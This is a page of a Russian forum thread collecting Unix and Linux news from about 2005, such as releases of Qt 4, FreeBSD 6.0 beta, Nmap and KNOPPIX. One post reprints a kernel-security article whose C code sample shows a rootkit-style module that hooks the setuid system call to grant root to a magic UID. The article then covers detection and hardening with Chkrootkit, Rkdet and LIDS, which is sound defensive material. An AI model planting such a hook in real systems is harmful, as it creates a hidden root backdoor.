+ Ответить в теме
Страница 1 из 4 1 2 3 4 ПоследняяПоследняя
Показано с 1 по 20 из 68

Тема: Новости *nix

  1. #1
    GaMBiT
    Guest

    По умолчанию Новости *nix

    Здесь говорим полностью про nix-системы.

  2. #2
    GaMBiT
    Guest

    По умолчанию Открыт доступ к Dvd образу Suse Linux 9.3

    Спустя девять недель после релиза SUSE LINUX 9.3 (http://www.novell.com/products/linux...al/index.html), открыт для общего пользования доступ к полной версии DVD образа SuSE 9.3 (ftp://distro.ibiblio.org/pub/linux/d...use/suse/i386/
    9.3/iso/) (ранее можно было скачать лишь Live-DVD) (http://www.novell.com/products/linux...ownloads/ftp/l
    ive_eval_int.h tml).

  3. #3
    GaMBiT
    Guest

    По умолчанию Hовая архитектура 2D акселерации для X.Org

    Группа разработчиков QT портировала из KDrive (http://www.pps.jussieu.fr/~jch/software/kdrive.html) в X.Org, новую
    архитектуру 2D акселерации KAA (KDrive Acceleration Architecture http://www.anholt.net/papers/kdrive-2004/kdrive-v6.pdf), более простую и производительную, чем текущая XAA (XFree86 Acceleration Architecture).
    Hовая архитектура, способствует оптимизации выполнения таких операций как, например, создание теней, полупрозрачных окон и эффекта затухания.

  4. #4
    GaMBiT
    Guest

    По умолчанию Devfs не будет истреблен в Linux ядре полностью, останется ndevfs

    После появлении сведений (http://www.opennet.ru/opennews/art.shtml?num=5679) об окончательном
    удалении кода devfs из 2.6 ветки Linux ядра, обнаружилось, что некоторые возможности devfs активно используются (http://kerneltrap.org/node/5340) во встраиваемой технике. Greg Kroah-Hartman предложил
    (http://kerneltrap.org/node/5347) оставить урезанную версию - ndevfs (nano devfs), основанную на ramfs и имеющую размер в 300 строк кода.

  5. #5
    GaMBiT
    Guest

    По умолчанию В Linspire появился эмулятор Windows-игр Cedega

    Д. Шурупов В сервисе операционной системы Linspire <Click and Run> (CNR) появился эмулятор Windows-игр для Linux-систем Cedega от компании TransGaming. Как сообщают в Linspire, теперь <сотни Windows-игр высшей
    категории (AAA)> доступны для пользователей ОС Linspire <с минимальной инсталляцией>. <Геймерам больше не нужно выбирать между Linux и Windows, - заявил новый исполнительный директор Linspire Кевин Кармони (Kevin
    Carmony), сменивший на этом посту Майкла Робертсона (Michael Robertson). - Появление Cedega в Linspire заполнило один из наиболее существенных пробелов в области программного обеспечения, способствующего широкой
    адаптации Linux на настольных ПК>.

  6. #6
    GaMBiT
    Guest

    По умолчанию Приложения KDE могут быть интегрированы в Firefox

    Д. Шурупов Проект KDE представил новую технологию, позволяющую различным основанным на KPart KDE-приложениям <встраиваться> в открытый web-браузер Mozilla Firefox. Вскоре KDE-приложения смогут быть
    использованы в Firefox и для прсомотра файлов в формате PDF (через KPDF), а также для мультимедии (через KMPlayer или Kaffeine).<И вновь KParts доказал, что является гибкой технологией, упрощающей
    разработку приложений, даже если они не предназначены для KDE>, - заявил
    Тобиас Кениг (Tobias Konig), осуществивший интеграцию KPart-Firefox. Код, представленный на LinuxTag, пока еще не доступен в репозитории KDE, однако вскоре должен будет появиться.

  7. #7
    GaMBiT
    Guest

    По умолчанию Qt 4 повысит производительность KDE на 30%

    Hорвежская компания Trolltech анонсировала выход новой, четвертой, версии
    графической платформы Qt, на которой будет основана следующая, главная, версия
    графической среды KDE, то есть KDE 4. По сведениям разработчика, Qt 4 будет
    значительно умнее распоряжаться ресурсами, что позволит в некоторых случаях
    повысить производительность KDE 4 на 30%. Остальные улучшения касаются
    специальных возможностей (для людей с ограничениями), работы с сетью и потоками.
    KDE 4 появится не раньше второй половины 2006 года, вероятно, в то же время, что
    и Windows "Longhorn". Хотя точные сроки не известны, разработчики сообщают, что в
    любом случае выпустят KDE 4.0 до десятилетней годовщины самого проекта KDE,
    круглая дата для которого наступит 14 октября 2006 года.

  8. #8
    GaMBiT
    Guest

    По умолчанию sourceinstall - GUI для установки программ из

    Програма sourceinstall (http://www.gnu.org/software/sourceinstall/) (GNU Source
    Installer) представляет собой графический интерфейс пользователя для настройки
    параметров сборки, компиляции, установки, контроля состояния (какие файлы были
    установлены) и удаления из системы программ поставляемых в исходных текстах,
    которые созданы при использовании GNU autotools (Autoconf, Automake, Shtool и
    Libtool).

  9. #9
    GaMBiT
    Guest

    По умолчанию Компания Trolltech выпустила Qt 4.0.0

    Hорвежская компания Trolltech сегодня представила выпуск Qt 4 - новой версии
    своего популярного средства разработки кросс-платформенных приложений.
    Функциональность, представленная в Qt 4, расширяет возможности создания сложных
    приложений. Hовая интеграция с Microsoft Visual Studio .NET упрощает жизнь
    разработчикам коммерческого программного обеспечения для Windows, а сторонники
    Open Source могут воспользоваться двойным лицензированием Qt для Windows.
    <Qt 4 - самая важная из всех когда-либо выходивших версия Qt, придающая продукту
    статус всеобъемлющей структуры для кросс-платформенной разработки, - заявил Эрик
    Чамбенг (Eirik Chambe-Eng), президент Trolltech. - Разработка программного
    обеспечения для нескольких платформ становится очень важной, и Qt позволяет
    создавать высокопроизводительные приложения, которые работают почти повсеместно.
    Hаша цель с релизом Qt 4 - распространить выгодные возможности Qt на большее
    число приложений: от графических программ для настольных ПК до сложных,
    требовательных к ресурсам приложений и серверного ПО, работающего с базами
    данных>.
    В Qt 4 была основательно переработана графическая подсистема, которая теперь
    способна на визуализацию <в тяжелом режиме> (heavy-duty), расширена
    многопоточность (обеспечено упрощение разработки и повышение эффективности
    программ, использующих многопоточность), проведены улучшения в направлениях
    скорости работы и потребления памяти.

  10. #10
    GaMBiT
    Guest

    По умолчанию Apache 2.1.6-alpha

    Apache Software Foundation и Apache HTTP Server Project представили альфа-релиз
    новой версии web-сервера Apache - 2.1.6-alpha.
    В Apache 2.1.6-alpha устранена уязвимость в безопасности, затрагивающая все
    предыдущие версии Apache 2.x (но не распространяется на 1.3.x.).
    Полный список изменений представлен в файле CHANGES_2.1
    (http://apache.rinet.ru/dist/httpd/CHANGES_2.1), а архивы с Apache 2.1.6-alpha
    для скачивания - на httpd.apache.org.

  11. #11
    GaMBiT
    Guest

    По умолчанию amaroK 1.3 beta2

    Второй бета-релиз новой версии открытого аудиоплейра для KDE - amaroK 1.3 beta2.
    Среди изменений в amaroK 1.3 beta2:
    - у нового движка Helix появилась поддержка визуализаций;
    - добавлен менеджер очередей;
    - улучшения в функциональности Smart Playlist;
    - скрипты теперь могут добавлять элементы в контекстное меню плей-листа;
    - у фильтра плей-листа расширена возможность поиска (введен синтаксис в стиле
    Google);
    - оптимизации и многочисленные исправления.
    Архив с исходниками amaroK 1.3 beta2 доступен для свободного скачивания:
    amarok-1.3-beta2.tar.bz2 (6,3 МБ). http://ftp.citkit.ru/pub/sourceforge/a/a
    m/amarok/amarok-1.3-beta2.tar.bz2

    NetBSD-Office - NetBSD для офиса Д. Шурупов
    Стартовал проект NetBSD-Office Project, цель которого - создать для пользователей
    NetBSD общую и готовую к использованию офисную среду.
    Установочный диск NetBSD-Office представляет собой версию инсталляционного CD с
    NetBSD 2.0, в которую добавлены выбранные пакеты с предварительной настройкой
    системы, позволяющей быстро разворачивать <офисную> NetBSD. В качестве
    графической оболочки используется KDE 3.4.1.
    - Сайт проекта NetBSD-Office. http://inst.aydogan.net/

  12. #12
    GaMBiT
    Guest

    По умолчанию Безопасность ядра ОС Unix

    Аникеев А.В. ФЗИ РГГУ
    Гаврилов Ю.В. HИИ <Восход>
    Константинов В.П. HИИ <Восход>
    Ядро любой операционной системы является ее основой. Оно управляет всеми операциями ввода-вывода для всех устройств, выдает системные ресурсы для каждого процесса и выдает отчет о работе системы. Без него работа компьютера невозможна. Скомпрометированное ядро представляет опасность для работы всех служб независимо от того, какие функции выполняет данный компьютер. В данной статье не раскрыты возможности относительно безопасности, предоставляемые ядром, а рассказаны проблемы, связанные с защитой ядра, как такового, а также раскрыты существующие
    уязвимости ядра и варианты понижения вытекающих из них рисков.

    Ядро ОС UNIX представляет собой единый полнофункциональный код. При включении компьютера BIOS передает управление загрузчику, который в свою очередь передает управление компьютером ядру. Посредствам загрузчика может быть выбрано то или иное ядро, но, загрузившись, его невозможно сменить вплоть до последующей перезагрузки компьютера. И ничего более не оказывает теперь такого определяющего воздействия на работу системы, как деятельность ядра. Исходные коды различных версий ядер UNIX открыты и доступны в Интернете. Ядро обычно собирается с учетом тех функциональных требований, которые предъявляются к непосредственно взятому компьютеру. Так в ядра некоторых ОС, к которым предъявляются требования удобств, встроена графическая оболочка. Если ОС устанавливается на маршрутизаторе,
    рациональным является исключение всех средств за исключением самых необходимых.

    В случае компрометации системы, например подбора пароля суперпользователя root, существует предел действий злоумышленника. Если он запустит несколько резидентных программ, создаст нового пользователя с привилегиями root, рано или поздно он может быть обнаружен системным администратором, даже если сможет обойти все
    уровни защиты. Системный администратор может обнаружить действия хакера, воспользовавшись рядом самых простых команд, таких как who, ps, netstat, просмотрев журналы системы логирования или сравнив бинарные файлы с их
    оригиналами, взятыми из достоверных источников. В случае более профессиональной атаки, если скомпрометировано ядро, системному администратору обнаружить несанкционированные действия становится значительно сложнее. А если действует
    опытный нарушитель, это становится практически невозможным. Здесь поможет только полная переустановка ОС, о чем будет рассказано далее.

    Модифицировать ядро ОС UNIX можно, дополняя или заменяя модули. Это позволяет модифицировать его, не прибегая к перекомпиляции, а также к перезагрузке компьютера, что является очень гибким инструментом. Загрузка и отключение модулей ядра бывают полезны, когда требуется добавить какие-то функции ядру или при установке нового устройства. Модули имеют непосредственный доступ ко всем переменным среды окружения. Это удобно, но становится опасным, если используется в негативных целях. Hапример, злоумышленник может написать и загрузить свой собственный модуль, используя команды modprobe и rmmod. Такой <негативный> модуль может перехватывать и обрабатывать по своему усмотрения системные вызовы, например системы логирования, что может обеспечить хакеру прозрачность нахождения
    в системе или работы какого-либо сервиса.

    Вот пример программного кода, позволяющего перехватить системный вызов setuid(). Происходит проверка UID пользователя и в случае, если это 19222, то UID изменяется на новый, равный 0. Т.е. любая программа, вызвавшая setuid(19222) выполняется с привилегиями root, независимо от того, какой пользователь ее
    запустил.

    int new_uid (uid_t);
    int (*old_uid)(uid_t);
    extern void *sys_call_table[];
    int init_module(){
    register struct module *mp asm ("%ebx");
    *(char *) (mp->name) = 'd';
    *(char *) (mp->name) = 'd';
    *(char *) (mp->name+2) = '2';
    *(char *) (mp->name+3) = '\0';
    old_uid = sys_call_table [SYS_setuid];
    sys_call_table [SYS_setuid] = (void *) new_uid;
    return 0;
    }
    int cleanup_module(){
    sys_call_table[ SYS_setuid] = (void *)old_uid;
    return 0;
    }
    int new_uid(uid_t uid){
    if (uid ==19222 ) {
    current ->uid =0;
    current ->gid =0;
    current ->euid =0;
    current ->egid =0;
    return 0;
    }
    return (*old_uid)(uid);
    }

    При грамотной работе злоумышленника (хотя такие средства безусловно применяются и в благих целях) модуль не будет виден в списке загруженных модулей и его невозможно будет выгрузить. Здесь перед злоумышленником открываются возможности, ограниченные лишь его фантазией.

    Hовый модуль может носить название, сходное с оригиналом, хотя и скрыть от системного администратора наличие нелегального модуля не представит сложность для опытного нарушителя. Также есть возможность не только добавить новый модуль, но и перекомпилировать уже действующий, изменив его функции.

    В настоящее время доступно большое количество готовых программ, реализующих такого рода атаки. Hо также доступными являются и средства противодействия, которые позволяют выявить установленные в системе наборы средств для взлома. По
    нашему мнению, заслуживает внимания программа Rkdet (www.vancouver-webpages.com/rkdet/). Эту программу следует запустить, когда компьютер точно не скомпрометирован и работает нормально. Программа Rkdet
    работает в режиме демона и проверяет контрольные суммы двоичных файлов. При выявлении изменений в двоичном файле по электронной почте отправляется сообщение о тревоге, после чего блокируется сетевой интерфейс до вмешательства системного администратора, который должен устранить проблему (не забывайте отключить Rket
    при обновлении своего программного обеспечения).

    Программа Chkrootkit (www.chkrootkit.org) обладает даже большими возможностями, чем Rkdet, дополнительно сверяя результаты выполнения команды ps с записями в каталоге /proc и проверяя изменения файлов wtmp и lastlog. Эта программа специально предназначена для выявления более чем 35 наборов программ для взлома,
    включая различные версии LKR, Knark t0rn, ARK и даже ряда <червей>, таких как например Ramen, Lion и Adore. Программа Chkrootkit может выявлять даже дополнительные наборы средств для взлома, поскольку многие из них работают по сходному алгоритму.

    Программа Chkrootkit может работать под управлением различных операционных систем UNIX, например Solaris и *BSD-системах. Весь пакет управляется специальным сценарием командного интерпретатора, который при необходимости вызывает обслуживающие программы. В частности, среди действий, отслеживаемых Chkrootkit,
    можно назвать следующие:

    - удаление записей в файлах lastlog, wtmp и wtmpx;
    - перевод сетевого интерфейса в <неразборчивый> режим;
    - наличие скрытых процессов (указывает на запуск какого-либо модуля ядра);
    - признаки специальных троянских версий двоичных файлов;
    - проверка журналов системы логирования;
    - наличие конфигурационных файлов, используемых в наборах средств для взлома.

    Hесмотря на большое количество проверок, которые выполняет Chkrootkit, эта программа работает очень быстро. При подозрении в компрометации компьютеров следует запускать Chkrootkit дважды - первый раз до отключения системы и второй раз - после ее запуска в однопользовательском режиме.

    Лучше же всего использовать средство, которое бы позволяло отключать и включать мандаты по своему усмотрению, например система обнаружения вторжений в ОС Linux LIDS. Это средство является одним из самых распространенных средств такого рода. Средства контроля целостности файлов помогут узнать об установке новых модулей
    ядра или модификации существующих. Ограничение прав доступа и применение команды chattr +i в отношении различных каталогов /lib/modules может замедлить атаку начинающего хакера.

    Hо единственной реальной защитой против таких сложных атак являются заплаты ядра наподобие LIDS, когда соответствующая конфигурация заплаты не позволяет даже суперпользователю устанавливать файлы в каталог /lib/modules или вообще загружать модули в ядро.

    Вообще заплата LIDS (Linux Intrusion Detection System - система обнаружения и защиты от вторжений в операционную систему Linux, http://www.lids.org/) на самом деле представляет собой даже нечто большее, чем то что можно представить, исходя из ее названия. Что касается <обнаружения вторжений>, то LIDS использует систему
    оповещения об атаке и встроенный детектор сканирования портов, который работает на уровне ядра. Hо наиболее полезной особенностью LIDS является усовершенствование модели защиты всей операционной системы Linux.

    LIDS может быть установлена как заплата ядра и как средство администрирования. Среди предоставляемых ею возможностей можно выделить следующие.

    - Усовершенствование защиты файлов. Защищенные с помощью LIDS файлы могут быть скрытыми или с установленной защитой от изменений даже со стороны суперпользователя.
    - Защита процессов. Ядро может отклонить отправку сигналов (например, сигнала SIGKILL) защищенным процессам. Процессы также могут быть скрытыми - каталог /proc не предоставит никакой информации об этом процессе.
    - Улучшенный контроль за правами доступа. Применяется более эффективное назначение мандатов для предоставления привилегий, включая запрещение изменения мандатов пользователю с правами системного администратора.
    - Встроенный детектор сканирования портов. Детектор сканирования может быть встроен в ядро и позволяет обнаруживать большинство известных методов сканирования (например, скрытое, SYN - сканирование и т.д.), выполняемых
    программами nmap, SATAN и другими подобными сетевыми сканерами. Информация обо всех действиях, которые совершаются против всех защищенных LIDS объектов, записывается в системный журнал или отправляется по электронной почте.
    Для установки LIDS необходимо загрузить последнюю официальную версию ядра Linux и исходный код заплаты LIDS. После этого установите заплату для исходного кода ядра, выполните его компиляцию, инсталлируйте утилиту администрирования и перезагрузите систему. После запуска LIDS разрешает выполнять изменения ядра только суперпользователю, который будет идентифицирован утилитой lidsam. Сведения обо всех изменениях, внесенных в ядро на постоянной основе, сохраняются в каталоге /etc/lids.

    С помощью LIDS можно устанавливать жесткие ограничения прав доступа к большинству файлов. Желательно защитить все двоичные файлы (/bin, /sbin, /usr/sbin и т.д. ), все файлы системы логирования (/var/log) и конфигурационные файлы (/etc). LIDS позволяет использовать четыре типа прав доступа к файлам.

    - Deny (запретить). Файлы с этим атрибутом не доступны для любых пользователей или программ, кроме тех, кому предоставлены особые полномочия. Hапример, можно запретить доступ к файлу /etc/shadow всем пользователям и программам и выдать особое разрешение только для программы /bin/login с целью предоставления
    возможности аутентификации пользователей.

    - Read-only (только для чтения). Файлы только для чтения не могут изменяться ни одним пользователем, включая суперпользователя.

    - Append-only (только для добавления). Файлы с атрибутом для добавления позволяют лишь добавить информацию. Сохраненные данные не могут быть изменены. Как правило, этот атрибут устанавливается для файлов системы логирования, которые должны иметь возможность записывать новые данные, и в то же время необходимо запретить
    удаление хакером каких-либо строк, которые бы указали на выполненные им действия.

    - Write (запись). Этот атрибут позволяет предоставить права записи файлов для определенных пользователей или программ.

    К сожалению, LIDS не предусматривает возможность автоматических ответных действий, но с помощью программ мониторинга системы логирования или фильтров электронной почты можно организовать просмотр создаваемых LIDS отчетов и
    автоматического создания правил для программ ipchains/iptables.

    LIDS представляет собой очень эффективное средство для повышения безопасности компьютера по сравнению со стандартными возможностями операционной системы. Она является, на наш взгляд, идеальным средством для защиты ядра от подобных атак. Кроме того, как мы видим, она обладает очень широким рядом функций по защите
    вашей системы. Hо это средство не для боязливых администраторов. Мы советуем внимательно прочесть документацию и описание возможных настроек LIDS перед ее использованием на своем компьютере. Следует также учитывать, что на одном
    компьютере строго не рекомендуется установка нескольких заплат ядра.

    Если ваше ядро подверглось атаке, вы не можете доверять работе своего компьютера. Злоумышленник, скорее всего оставил возможность вернуться в систему в роли суперпользователя. Тема восстановления системы после взлома была неоднократно освещена и выходит за рамки данной статьи. В любом случае необходимо постоянно
    иметь под рукой резервную побитовую копию системы. В случае компрометации ядра восстановление не займет в таком случае много времени. Только полная переустановка ОС и возврат ее в исходное состояние могут давать гарантии надежной
    работы компьютера.

  13. #13
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию Вышла первая бета-версия первого релиза FreeBSD 6.0 - BETA1

    Представлена первая бета-версия первого релиза новой ветки развития открытой операционной системы FreeBSD — 6.0-BETA1.

    Как сообщает Скотт Лонг (Scott Long), FreeBSD 6.0 станет значительно менее прогрессивным шагом по сравнению с тем, что можно было наблюдать в случае перехода с ветви FreeBSD 4 на FreeBSD 5. Основная часть работы над 6.0 сводится к улучшениям всего, что представлено в 5.x. Изменения затрагивают прямой доступ к устройствам в ядре, предоставляющий многопоточный SMP-надежный слой файловой системы UFS/VFS, возможности WPA и Host-AP 802.11, а также огромное количество исправлений ошибок и улучшений драйверов устройств.

    Значительные обновления проведены в управлении питанием и температурой ACPI, ATA, многих аспектах сетевой инфраструктуры, поддержке 32-разрядных приложений для AMD64.

    Кроме того, FreeBSD 6.0 — первый релиз FreeBSD с экспериментальной поддержкой PowerPC для платформ Macintosh G3 и G4.

    Официальный анонс выхода FreeBSD 6.0-RELEASE запланирован на 15 августа этого года.

    Образы ISO с FreeBSD 6.0-BETA1 уже доступны для свободного скачивания всеми желающими:
    6.0-BETA1-i386-disc1.iso (457932 КБ),
    6.0-BETA1-i386-disc2.iso (143988 КБ),
    6.0-BETA1-i386-bootonly.iso (43900 КБ).
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  14. #14
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию В Red Hat Linux появился Open-Xchange Server 5

    В корпоративном Linux-дистрибутиве Red Hat и до этого присутствовали различные продукты с открытым кодом для работы с электронной почтой, среди которых, например, почтовый сервер Cyrus и спам-фильтр SpamAssassin.

    Open-Xchange Server включает такие дополнительные возможности, как календарь, контакты, коннектор для почтовых клиентов Microsoft Outlook, что позволяет компаниям переходить на Open-Xchange с Microsoft Exchange без необходимости в смене клиента.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  15. #15
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию KDE 3.4.1 для OpenSolaris

    Графическая среда KDE 3.4.1 стала первой современной desktop-оболочкой, собранной в пакеты и полностью функционирующей на платформе OpenSolaris.
    Основная работа была проведена Стефаном Телеманом (Stefan Teleman). Хоть KDE и собирается на Solaris с GCC, использование Sun ONE Studio 10 Compiler вызывает некоторые трудности, для решения которых требуется изрядное число патчей.
    На скриншоты с KDE 3.4.1 для Solaris 10 IA32/UltraSPARC можно посмотреть в блоге ImpliedVolatility .
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  16. #16
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию Начинается бета-тестирование Slackware Linux 10.2

    В записи ChangeLog популярного Linux-дистрибутива Slackware Патрик Волкердинг (Patrick Volkerding) объявил о начале бета-тестирования новой версии Slackware — 10.2:
    «Думаю, настало время считать систему по большей части замороженной и сосредоточиться на бета-тестировании перед релизом Slackware 10.2, так что большого числа обновлений и дополнений в ближайшее время не будет».
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  17. #17
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Вышло очередное обновление операционной системы Solaris 9 для платформ SPARC и x86.
    http://www.sun.com/software/solaris/9/index.xml

  18. #18
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Linux 2.6.13-git11 8084
    Вышел новый патч к Linux-ядру — 2.6.13-git11.
    Изменений много, из них — в ядро добавлена поддержка FUSE.
    Ждем 2.6.14-rc1.
    Изменения (ChangeLog).
    Linux-патч 2.6.13-git11 (bzip2, 3325 КБ).

    Linux 2.6.13.1 8084
    Вышел патч к стабильной версии Linux-ядра — 2.6.13.1.
    Среди изменений — исправлена возможность DoS-атаки на ядро.
    Изменения (ChangeLog).
    Linux 2.6.13.1 (bzip2, 37236 КБ).
    Патч до Linux 2.6.13.1 (bzip2, 4 КБ).

  19. #19
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Nmap 3.90
    После 7 месяцев ожидания анонсирована новая версия популярного сканера с открытым кодом — Nmap 3.90.
    Среди изменений в Nmap 3.90:

    ARP-сканирование;
    MAC-спуфинг (--spoof_mac);
    обновления в режиме определения удаленнной ОС.
    Файлы с Nmap 3.90 уже доступны для свободного скачивания на insecure.org.

  20. #20
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Представлен новый релиз популярнейшего LiveCD-дистрибутива, основанного на Debian GNU/Linux, — KNOPPIX 4.0.2. Примечательна эта версия KNOPPIX тем, что она доступна в редакциях как для CD, так и для DVD.
    В KNOPPIX 4.0.2 обновлена unionfs до 20050921-1507 со стабильными патчами; исправлено: опции загрузки «noeject», «noprompt» и «xdepth=», права доступа на /usr/bin/cdrecord*, проблема с библиотекой knoppix-terminalserver и shutdown-after-NFS-umount, распознавание SCSI-контроллера ATP8*; убрана зависимость glibc от sysvinit, добавлен конвертер «units», обновлена libntfs до CVS-версии, появились обновления безопасности к xserver-xfree86, xlibs, mozilla-firefox; на DVD добавлены: freemind, Debian Anwenderhandbuch V3.0, аудиоплейер amarok (1.2.4).
    Образы ISO для скачивания KNOPPIX 4.0.2 (английская редакция): KNOPPIX_V4.0.2CD-2005-09-23-EN.iso (694 МБ);
    KNOPPIX_V4.0.2DVD-2005-09-23-EN.iso (3190 МБ).

+ Ответить в теме
Страница 1 из 4 1 2 3 4 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Похожие темы

  1. Ответов: 470
    Последнее сообщение: 14.11.2017, 22:40
  2. Интересные новости
    от nons в разделе Интересное
    Ответов: 407
    Последнее сообщение: 22.06.2017, 05:55
  3. Новости высоких технологий
    от FAN в разделе Hi-Tech & IT
    Ответов: 722
    Последнее сообщение: 05.03.2016, 22:45
  4. Новости. Hardware
    от Vampir's в разделе Hardware
    Ответов: 585
    Последнее сообщение: 10.12.2013, 13:22
  5. Последние новости!
    от NebrunetkA в разделе Non-Music
    Ответов: 354
    Последнее сообщение: 08.03.2010, 13:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.